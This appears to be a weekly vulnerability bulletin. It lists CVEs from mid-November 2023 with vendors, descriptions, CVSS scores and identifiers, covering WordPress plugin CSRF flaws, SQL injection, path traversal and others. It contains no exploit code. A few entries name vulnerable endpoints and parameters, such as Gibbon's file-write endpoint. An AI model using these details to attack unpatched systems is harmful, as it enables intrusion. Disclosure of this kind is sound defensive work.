dreamer_cms — dreamer_cms Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/task/run 2023-11-13 8.8 CVE-2023-48058
dreamer_cms — dreamer_cms Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/task/add 2023-11-13 8.8 CVE-2023-48060
emsigner — emsigner Incorrect access control in the Forgot Your Password function of EMSigner v2.8.7 allows unauthenticated attackers to access accounts of all registered users, including those with administrator privileges via a crafted password reset token. 2023-11-14 9.8 CVE-2023-43902
fortinet — fortimail An improper restriction of excessive authentication attempts vulnerability [CWE-307] in FortiMail webmail version 7.2.0 through 7.2.4, 7.0.0 through 7.0.6 and before 6.4.8 may allow an unauthenticated attacker to perform a brute force attack on the affected endpoints via repeated login attempts. 2023-11-14 7.3 CVE-2023-45582
fortinet — fortiwlm A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 and 8.4.2 through 8.4.0 and 8.3.2 through 8.3.0 and 8.2.2 allows attacker to read arbitrary files via crafted http requests. 2023-11-14 7.5 CVE-2023-42783
froxlor — froxlor Improper Link Resolution Before File Access in GitHub repository froxlor/froxlor prior to 2.1.0. 2023-11-10 8.8 CVE-2023-6069
 
gibbonedu — gibbon GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write because rubrics_visualise_saveAjax.phps does not require authentication. The endpoint accepts the img, path, and gibbonPersonID parameters. The img parameter is expected to be a base64 encoded image. If the path parameter is set, the defined path is used as the destination folder, concatenated with the absolute path of the installation directory. The content of the img parameter is base64 decoded and written to the defined file path. This allows creation of PHP files that permit Remote Code Execution (unauthenticated). 2023-11-14 9.8 CVE-2023-45878
gibbonedu — gibbon GibbonEdu Gibbon through version 25.0.0 allows Directory Traversal via the report template builder. An attacker can create a new Asset Component. The templateFileDestination parameter can be set to an arbitrary pathname (and extension). This allows creation of PHP files outside of the uploads directory, directly in the webroot. 2023-11-14 7.2 CVE-2023-45880
golden — golden An issue in Golden v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token. 2023-11-14 7.5 CVE-2023-45558
hanwhavision — wave_server_software Bashis, a Security Researcher at IPVM has found a flaw that allows for a remote code execution during the installation of Wave on the camera device. The Wave server application in camera device was vulnerable to command injection allowing an attacker to run arbitrary code. HanwhaVision has released patched firmware for the highlighted flaw. Please refer to the hanwhavision security report for more information and solution.” 2023-11-13 8.8 CVE-2023-5747
headscale — headscale Headscale through 0.22.3 writes bearer tokens to info-level logs. 2023-11-11 7.5 CVE-2023-47390
icssolution — ics_business_manager A SQL injection vulnerability has been found in ICS Business Manager, affecting version 7.06.0028.7089. This vulnerability could allow a remote user to send a specially crafted SQL query and retrieve all the information stored in the database. The data could also be modified or deleted, causing the application to malfunction. 2023-11-13 8.8 CVE-2023-6097
intel(r) — unison_software Improper authentication for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via network access. 2023-11-14 8.8 CVE-2023-22663
intel(r) — unison_software Improper input validation for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via network access. 2023-11-14 8.8 CVE-2023-36860
intel(r) — unison_software Improper access control for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via network access. 2023-11-14 8.8 CVE-2023-39221
intel(r) — unison_software Cross-site request forgery in some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via network access. 2023-11-14 8.8 CVE-2023-39412
intel(r) — unison_software Improper input validation for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 7.8 CVE-2022-45469
intel(r) — unison_software Uncaught exception for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 7.8 CVE-2023-22292
intel(r) — unison_software Access of memory location after end of buffer for some Intel Unison software may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 7.8 CVE-2023-38570
intel(r) — unison_software Improper access control for some Intel Unison software may allow an unauthenticated user to potentially enable denial of service via network access. 2023-11-14 7.5 CVE-2023-22285
intel(r) — unison_software Improper input validation for some Intel Unison software may allow an unauthenticated user to potentially enable denial of service via network access. 2023-11-14 7.5 CVE-2023-22337
intel(r) — unison_software Improper access control for some Intel Unison software may allow an unauthenticated user to potentially enable denial of service via network access. 2023-11-14 7.5 CVE-2023-39228
intel(r) — unison_software Improper access control for some Intel Unison software may allow a privileged user to potentially enable escalation of privilege via network access. 2023-11-14 7.2 CVE-2023-22448
johnson_controls — quantum_hd_unity_compressor_firmware An unauthorized user could access debug features in Quantum HD Unity products that were accidentally exposed. 2023-11-10 9.8 CVE-2023-4804
 
linux — kernel A use-after-free vulnerability in the Linux kernel’s netfilter: nf_tables component can be exploited to achieve local privilege escalation. The function nft_trans_gc_catchall did not remove the catchall set element from the catchall_list when the argument sync is true, making it possible to free a catchall set element many times. We recommend upgrading past commit 93995bf4af2c5a99e2a87f0cd5ce547d31eb7630. 2023-11-14 7.8 CVE-2023-6111
 
memberscard — memberscard An issue in Yasukawa memberscard v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token. 2023-11-14 7.5 CVE-2023-45560
microsoft — edge_chromium Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability 2023-11-10 7.3 CVE-2023-36014
microsoft — edge_chromium Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability 2023-11-10 7.1 CVE-2023-36024
netgate — pfsense An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components. 2023-11-14 8.8 CVE-2023-42326
phonepe — phonepe Server-Side Request Forgery (SSRF) vulnerability in PhonePe PhonePe Payment Solutions. This issue affects PhonePe Payment Solutions: from n/a through 1.0.15. 2023-11-13 7.5 CVE-2022-45835
phpgurukul — restaurant_table_booking_system A vulnerability was found in PHPGurukul Restaurant Table Booking System 1.0. It has been rated as critical. This issue affects some unknown processing of the file check-status.php of the component Booking Reservation Handler. The manipulation leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-244943. 2023-11-10 9.8 CVE-2023-6074
 
phpgurukul — restaurant_table_booking_system A vulnerability classified as problematic was found in PHPGurukul Restaurant Table Booking System 1.0. Affected by this vulnerability is an unknown functionality of the file booking-details.php of the component Reservation Status Handler. The manipulation of the argument bid leads to information disclosure. The attack can be launched remotely. The identifier VDB-244945 was assigned to this vulnerability. 2023-11-10 7.5 CVE-2023-6076
 
phpgurukul — teacher_subject_allocation_management_system SQL Injection vulnerability in index.php in phpgurukul Teacher Subject Allocation Management System 1.0 allows attackers to run arbitrary SQL commands and obtain sensitive information via the ‘searchdata’ parameter. 2023-11-14 7.5 CVE-2023-46024
qnap — qumagie An OS command injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following version: QuMagie 2.1.3 and later 2023-11-10 8.8 CVE-2023-39295
qnap — qumagie A SQL injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network. We have already fixed the vulnerability in the following version: QuMagie 2.1.4 and later 2023-11-10 8.8 CVE-2023-41284
qnap — qumagie A SQL injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network. We have already fixed the vulnerability in the following version: QuMagie 2.1.4 and later 2023-11-10 8.8 CVE-2023-41285
remarshal — remarshal Remarshal prior to v0.17.1 expands YAML alias nodes unlimitedly, hence Remarshal is vulnerable to Billion Laughs Attack. Processing untrusted YAML files may cause a denial-of-service (DoS) condition. 2023-11-13 7.5 CVE-2023-47163

 

salesagility — suitecrm Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2. 2023-11-14 9.8 CVE-2023-6126
 
salesagility — suitecrm Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2. 2023-11-14 8.8 CVE-2023-6125
 
salesagility — suitecrm Path Traversal: ‘..filename’ in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2. 2023-11-14 8.8 CVE-2023-6130
 
salesagility — suitecrm Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2. 2023-11-14 8.8 CVE-2023-6131
 
shenzhen_youkate_industrial — facial_love_cloud_platform A vulnerability classified as critical has been found in Shenzhen Youkate Industrial Facial Love Cloud Payment System up to 1.0.55.0.0.1. This affects an unknown part of the file /SystemMng.ashx of the component Account Handler. The manipulation of the argument operatorRole with the input 00 leads to improper privilege management. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-245061 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-11-13 9.8 CVE-2023-6099

 

siemens — comos A vulnerability has been identified in COMOS (All versions < V10.4.4). Ptmcast executable used for testing cache validation service in affected application is vulnerable to Structured Exception Handler (SEH) based buffer overflow. This could allow an attacker to execute arbitrary code on the target system or cause denial of service condition. 2023-11-14 9.8 CVE-2023-43504
siemens — comos A vulnerability has been identified in COMOS (All versions < V10.4.4). Caching system in the affected application leaks sensitive information such as user and project information in cleartext via UDP. 2023-11-14 7.5 CVE-2023-43503
statamic_cms — statamic_cms Statmic is a core Laravel content management system Composer package. Prior to versions 3.4.13 and 4.33.0, on front-end forms with an asset upload field, PHP files crafted to look like images may be uploaded. This only affects forms using the “Forms” feature and not just _any_ arbitrary form. This does not affect the control panel. This issue has been patched in 3.4.13 and 4.33.0. 2023-11-10 9.8 CVE-2023-47129

 

sysaid — sysaid_on-premises In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023. 2023-11-10 9.8 CVE-2023-47246

 

telit — bgs5_firmware A CWE-269: Improper Privilege Management vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to elevate privileges to “manufacturer” level on the targeted system. 2023-11-10 7.8 CVE-2023-47611
thinkingreed_inc. — oss_calendar SQL injection vulnerability in OSS Calendar versions prior to v.2.0.3 allows a remote authenticated attacker to execute arbitrary code or obtain and/or alter the information stored in the database by sending a specially crafted request. 2023-11-14 8.8 CVE-2023-47609
 
tongda — tongda_oa A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this issue is some unknown functionality of the file general/vehicle/checkup/delete.php. The manipulation of the argument VU_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-244994 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-11-12 9.8 CVE-2023-6084

 

wbce — wbce_cms SQL injection vulnerability in the miniform module in WBCE CMS v.1.6.0 allows remote unauthenticated attacker to execute arbitrary code via the DB_RECORD_TABLE parameter. 2023-11-10 9.8 CVE-2023-39796

 

weston-embedded — cesium_net An out-of-bounds write vulnerability exists in the HTTP Server functionality of Weston Embedded uC-HTTP v3.01.01. A specially crafted network packet can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. 2023-11-14 9.8 CVE-2023-24585
weston-embedded — cesium_net A heap-based buffer overflow vulnerability exists in the HTTP Server functionality of Weston Embedded uC-HTTP v3.01.01. A specially crafted set of network packets can lead to arbitrary code execution. An attacker can send a malicious packet to trigger this vulnerability. 2023-11-14 9.8 CVE-2023-25181
weston-embedded — cesium_net A heap-based buffer overflow vulnerability exists in the HTTP Server form boundary functionality of Weston Embedded uC-HTTP v3.01.01. A specially crafted network packet can lead to code execution. An attacker can send a malicious packet to trigger this vulnerability. 2023-11-14 9.8 CVE-2023-27882
weston-embedded — cesium_net A memory corruption vulnerability exists in the HTTP Server form boundary functionality of Weston Embedded uC-HTTP v3.01.01. A specially crafted network packet can lead to code execution. An attacker can send a malicious packet to trigger this vulnerability. 2023-11-14 9.8 CVE-2023-28379
weston-embedded — cesium_net A memory corruption vulnerability exists in the HTTP Server header parsing functionality of Weston Embedded uC-HTTP v3.01.01. Specially crafted network packets can lead to code execution. An attacker can send a malicious packet to trigger this vulnerability. 2023-11-14 9.8 CVE-2023-28391
weston-embedded — cesium_net A memory corruption vulnerability exists in the HTTP Server Host header parsing functionality of Weston Embedded uC-HTTP v3.01.01. A specially crafted network packet can lead to code execution. An attacker can send a malicious packet to trigger this vulnerability. 2023-11-14 9.8 CVE-2023-31247
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in StylemixThemes Motors – Car Dealer, Classifieds & Listing. This issue affects Motors – Car Dealer, Classifieds & Listing: from n/a through 1.4.6. 2023-11-13 7.5 CVE-2023-46207
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability leading to Local File Inclusion (LF) in Webpushr Web Push Notifications Web Push Notifications – Webpushr plugin <= 4.34.0 versions. 2023-11-13 8.8 CVE-2023-35041
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WPGrim Dynamic XML Sitemaps Generator for Google plugin <= 1.3.3 versions. 2023-11-13 8.8 CVE-2023-26514
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WPIndeed Debug Assistant plugin <= 1.4 versions. 2023-11-13 8.8 CVE-2023-26516
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in AccessPress Themes WP TFeed plugin <= 1.6.9 versions. 2023-11-13 8.8 CVE-2023-26518
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in ExpressTech Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress plugin <= 8.0.10 versions. 2023-11-13 8.8 CVE-2023-26524
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in ??? ?????????????-??Baidu/Google/Bing/IndexNow/Yandex/?? plugin <= 4.2.7 versions. 2023-11-13 8.8 CVE-2023-26531
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Aleksandr Guidrevitch WP Meteor Website Speed Optimization Addon plugin <= 3.1.4 versions. 2023-11-13 8.8 CVE-2023-26543
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Timo Reith Affiliate Super Assistent [sic] plugin <= 1.5.1 versions. 2023-11-12 8.8 CVE-2023-27417
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Side Menu Lite – add sticky fixed buttons plugin <= 4.0 versions. 2023-11-12 8.8 CVE-2023-27418
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in ThemeHunk Big Store theme <= 1.9.3 versions. 2023-11-12 8.8 CVE-2023-27431
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WPGrim Classic Editor and Classic Widgets plugin <= 1.2.5 versions. 2023-11-13 8.8 CVE-2023-27434
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Louis Reingold Elegant Custom Fonts plugin <= 1.0 versions. 2023-11-13 8.8 CVE-2023-27436
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Evgen Yurchenko WP Translitera plugin <= p1.2.5 versions. 2023-11-13 8.8 CVE-2023-27438
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in gl_SPICE New Adman plugin <= 1.6.8 versions. 2023-11-13 8.8 CVE-2023-27441
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Meril Inc. Blog Floating Button plugin <= 1.4.12 versions. 2023-11-13 8.8 CVE-2023-27445
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in audrasjb Reusable Blocks Extended plugin <= 0.9 versions. 2023-11-12 8.8 CVE-2023-27611
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Jens Törnell WP Page Numbers plugin <= 0.5 versions. 2023-11-12 8.8 CVE-2023-27623
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in mmrs151 Daily Prayer Time plugin <= 2023.03.08 versions. 2023-11-12 8.8 CVE-2023-27632
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Vsourz Digital CF7 Invisible reCAPTCHA plugin <= 1.3.3 versions. 2023-11-12 8.8 CVE-2023-28167
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in flippercode WordPress Plugin for Google Maps – WP MAPS (formerly WP Google Map Plugin) plugin <= 4.4.2 versions. 2023-11-12 8.8 CVE-2023-28172
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Amit Agarwal Google XML Sitemap for Images plugin <= 2.1.3 versions. 2023-11-12 8.8 CVE-2023-28173
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Stranger Studios Force First and Last Name as Display Name plugin <= 1.2 versions. 2023-11-12 8.8 CVE-2023-28419
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Leo Caseiro Custom Options Plus plugin <= 1.8.1 versions. 2023-11-12 8.8 CVE-2023-28420
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in MyThemeShop WP Shortcode by MyThemeShop plugin <= 1.4.16 versions. 2023-11-12 8.8 CVE-2023-28495
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Tribulant Slideshow Gallery LITE plugin <= 1.7.6 versions. 2023-11-12 8.8 CVE-2023-28497
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in MotoPress Hotel Booking Lite plugin <= 4.6.0 versions. 2023-11-12 8.8 CVE-2023-28498
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Marios Alexandrou Enhanced Plugin Admin plugin <= 1.16 versions. 2023-11-12 8.8 CVE-2023-28618
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Wbcom Designs Wbcom Designs – BuddyPress Activity Social Share plugin <= 3.5.0 versions. 2023-11-12 8.8 CVE-2023-28694
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Harish Chouhan, Themeist I Recommend Tplugin <= 3.9.0 versions. 2023-11-12 8.8 CVE-2023-28696
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Robin Phillips Mobile Banner plugin <= 1.5 versions. 2023-11-12 8.8 CVE-2023-28930
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Wpmet Wp Ultimate Review plugin <= 2.0.3 versions. 2023-11-12 8.8 CVE-2023-28987
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Whydonate Whydonate – FREE Donate button – Crowdfunding – Fundraising plugin <= 3.12.15 versions. 2023-11-12 8.8 CVE-2023-29238
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in plainware.Com ShiftController Employee Shift Scheduling plugin <= 4.9.23 versions. 2023-11-12 8.8 CVE-2023-29425
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Robert Schulz (sprd.Net AG) Spreadshop plugin <= 1.6.5 versions. 2023-11-10 8.8 CVE-2023-29426
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in SuPlugins Superb Social Media Share Buttons and Follow Buttons for WordPress plugin <= 1.1.3 versions. 2023-11-10 8.8 CVE-2023-29428
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in PressTigers Simple Job Board plugin <= 2.10.3 versions. 2023-11-10 8.8 CVE-2023-29440
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Tribulant Newsletters plugin <= 4.8.8 versions. 2023-11-10 8.8 CVE-2023-30478
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in ReCorp Export WP Page to Static HTML/CSS plugin <= 2.1.9 versions. 2023-11-10 8.8 CVE-2023-31077
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Marco Steinbrecher WP BrowserUpdate plugin <= 4.4.1 versions. 2023-11-10 8.8 CVE-2023-31078
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Prashant Walke WP All Backup plugin <= 2.4.3 versions. 2023-11-13 8.8 CVE-2023-32583
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in BRANDbrilliance Post State Tags plugin <= 2.0.6 versions. 2023-11-13 8.8 CVE-2023-32588
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Krzysztof Wielogórski Stop Referrer Spam plugin <= 1.3.0 versions. 2023-11-13 8.8 CVE-2023-33207
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in scriptburn.Com WP Hide Post plugin <= 2.0.10 versions. 2023-11-13 8.8 CVE-2023-34378
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Kebo Kebo Twitter Feed plugin <= 1.5.12 versions. 2023-11-13 8.8 CVE-2023-34384
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Bala Krishna, Sergey Yakovlev Category SEO Meta Tags plugin <= 2.5 versions. 2023-11-13 8.8 CVE-2023-46618
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WebDorado WDSocialWidgets plugin <= 1.0.15 versions. 2023-11-13 8.8 CVE-2023-46619
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Fluenx DeepL API translation plugin <= 2.3.9.1 versions. 2023-11-13 8.8 CVE-2023-46620
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in DAEXT Autolinks Manager plugin <= 1.10.04 versions. 2023-11-13 8.8 CVE-2023-46625
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in themelocation Remove Add to Cart WooCommerce plugin <= 1.4.4. 2023-11-13 8.8 CVE-2023-46629
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in David Stöckl Custom Header Images plugin <= 1.2.1 versions. 2023-11-13 8.8 CVE-2023-46636
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Webcodin WCP OpenWeather plugin <= 2.5.0 versions. 2023-11-13 8.8 CVE-2023-46638
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Cimatti Consulting WordPress Contact Forms by Cimatti plugin <= 1.6.0 versions. 2023-11-13 8.8 CVE-2023-47230
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin <= 3.10.3 versions. 2023-11-13 8.8 CVE-2023-47669
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in Poll Maker Team Poll Maker – Best WordPress Poll Plugin. This issue affects Poll Maker – Best WordPress Poll Plugin: from n/a through 4.6.2. 2023-11-13 7.5 CVE-2023-34013

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
amd — epyc_7h12_firmware Failure to validate the value in APCB may allow a privileged attacker to tamper with the APCB token to force an out-of-bounds memory read potentially resulting in a denial of service. 2023-11-14 4.9 CVE-2021-26345
asyncssh — asyncssh An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation. 2023-11-14 6.8 CVE-2023-46446
asyncssh — asyncssh An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the extension info message (RFC 8308) via a man-in-the-middle attack. 2023-11-14 5.9 CVE-2023-46445
auto_login_new_user_after_registration — auto_login_new_user_after_registration Cross-Site Request Forgery (CSRF) vulnerability in Jeff Sherk Auto Login New User After Registration allows Stored XSS.This issue affects Auto Login New User After Registration: from n/a through 1.9.6. 2023-11-13 6.1 CVE-2023-46201
byzoro — smart_s85f_firmware A vulnerability, which was classified as problematic, was found in Beijing Baichuo Smart S85F Management Platform V31R02B10-01. Affected is an unknown function of the file /login.php. The manipulation of the argument txt_newpwd leads to weak password recovery. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-244992. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-11-11 4.3 CVE-2023-5959

 

code-projects — blood_bank Cross Site Scripting (XSS) vulnerability in index.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via ‘msg’ parameter in application URL. 2023-11-13 6.1 CVE-2023-46015
code-projects — blood_bank Cross Site Scripting (XSS) in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the ‘search’ parameter in the application URL. 2023-11-13 6.1 CVE-2023-46016
code-projects — blood_bank Cross Site Scripting (XSS) vulnerability in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the ‘error’ parameter. 2023-11-13 6.1 CVE-2023-46019
code-projects — blood_bank Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the ‘rename’, ‘remail’, ‘rphone’ and ‘rcity’ parameters. 2023-11-13 6.1 CVE-2023-46020
code-projects — blood_bank SQL Injection vulnerability in hospitalLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via ‘hemail’ and ‘hpassword’ parameters. 2023-11-13 5.5 CVE-2023-46014
code-projects — blood_bank SQL Injection vulnerability in receiverLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via ‘remail’ and ‘rpassword’ parameters. 2023-11-13 5.5 CVE-2023-46017
code-projects — blood_bank SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via ‘remail’ parameter. 2023-11-13 5.5 CVE-2023-46018
code-projects — blood_bank SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the ‘reqid’ parameter. 2023-11-13 5.5 CVE-2023-46021
code-projects — inventory_management SQL injection vulnerability in Inventory Management v.1.0 allows a local attacker to execute arbitrary code via the name, uname and email parameters in the registration.php component. 2023-11-14 5.5 CVE-2023-46581
code-projects — inventory_management Cross-Site Scripting (XSS) vulnerability in Inventory Management V1.0 allows attackers to execute arbitrary code via the pname parameter of the editProduct.php component. 2023-11-14 5.4 CVE-2023-46580
code-projects — simple_task_list SQL injection vulnerability in addTask.php in Code-Projects Simple Task List 1.0 allows attackers to obtain sensitive information via the ‘status’ parameter. 2023-11-14 6.5 CVE-2023-46023
dedecms — dedecms DedeCMS v6.2 was discovered to contain a Cross-site Scripting (XSS) vulnerability via spec_add.php. 2023-11-13 5.4 CVE-2023-48068
digitaldruid — hoteldruid Cross-site scripting vulnerability in HOTELDRUID 3.0.5 and earlier allows a remote unauthenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product. 2023-11-10 6.1 CVE-2023-47164

 

discourse — discourse Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, some links can inject arbitrary HTML tags when rendered through our Onebox engine. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. There are no known workarounds. 2023-11-10 6.1 CVE-2023-47119

 

discourse — discourse Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, if a user has been quoted and uses a `|` in their full name, they might be able to trigger a bug that generates a lot of duplicate content in all the posts they’ve been quoted by updating their full name again. Version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches contain a patch for this issue. No known workaround exists, although one can stop the “bleeding” by ensuring users only use alphanumeric characters in their full name field. 2023-11-10 5.4 CVE-2023-45806

 

discourse — discourse Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, some theme components allow users to add svgs with unlimited `height` attributes, and this can affect the availability of subsequent replies in a topic. Most Discourse instances are unaffected, only instances with the svgbob or the mermaid theme component are within scope. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. As a workaround, disable or remove the relevant theme components. 2023-11-10 5.4 CVE-2023-46130

 

dreamer_cms — dreamer_cms An issue was discovered in dreamer_cms 4.1.3. There is a CSRF vulnerability that can delete a theme project via /admin/category/delete. 2023-11-13 4.3 CVE-2023-48063
emsigner — emsigner Insecure Direct Object References (IDOR) in EMSigner v2.8.7 allow attackers to gain unauthorized access to application content and view sensitive data of other users via manipulation of the documentID and EncryptedDocumentId parameters. 2023-11-14 6.5 CVE-2023-43900
emsigner — emsigner Incorrect access control in the AdHoc User creation form of EMSigner v2.8.7 allows unauthenticated attackers to arbitrarily modify usernames and privileges by using the email address of a registered user. 2023-11-14 5.9 CVE-2023-43901
getshortcodes — shortcodes_ultimate Server-Side Request Forgery (SSRF) vulnerability in Vova Anokhin WP Shortcodes Plugin – Shortcodes Ultimate.This issue affects WP Shortcodes Plugin – Shortcodes Ultimate: from n/a through 5.12.6. 2023-11-13 6.5 CVE-2023-23800
gibbonedu — gibbon GibbonEdu Gibbon through version 25.0.0 allows /modules/Planner/resources_addQuick_ajaxProcess.php file upload with resultant XSS. The imageAsLinks parameter must be set to Y to return HTML code. The filename attribute of the bodyfile1 parameter is reflected in the response. 2023-11-14 6.1 CVE-2023-45881
gibbonedu — gibbon GibbonEdu Gibbon version 25.0.0 allows HTML Injection via an IFRAME element to the Messager component. 2023-11-14 5.4 CVE-2023-45879
ibm — aix IBM AIX’s 7.3 Python implementation could allow a non-privileged local user to exploit a vulnerability to cause a denial of service. IBM X-Force ID: 267965. 2023-11-10 5.5 CVE-2023-45167

 

ibm — cics_tx IBM CICS TX Advanced 10.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 260821. 2023-11-13 6.1 CVE-2023-38364
 
ibm — cics_tx IBM CICS TX Advanced 10.1 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 260818. 2023-11-13 4.3 CVE-2023-38363
 
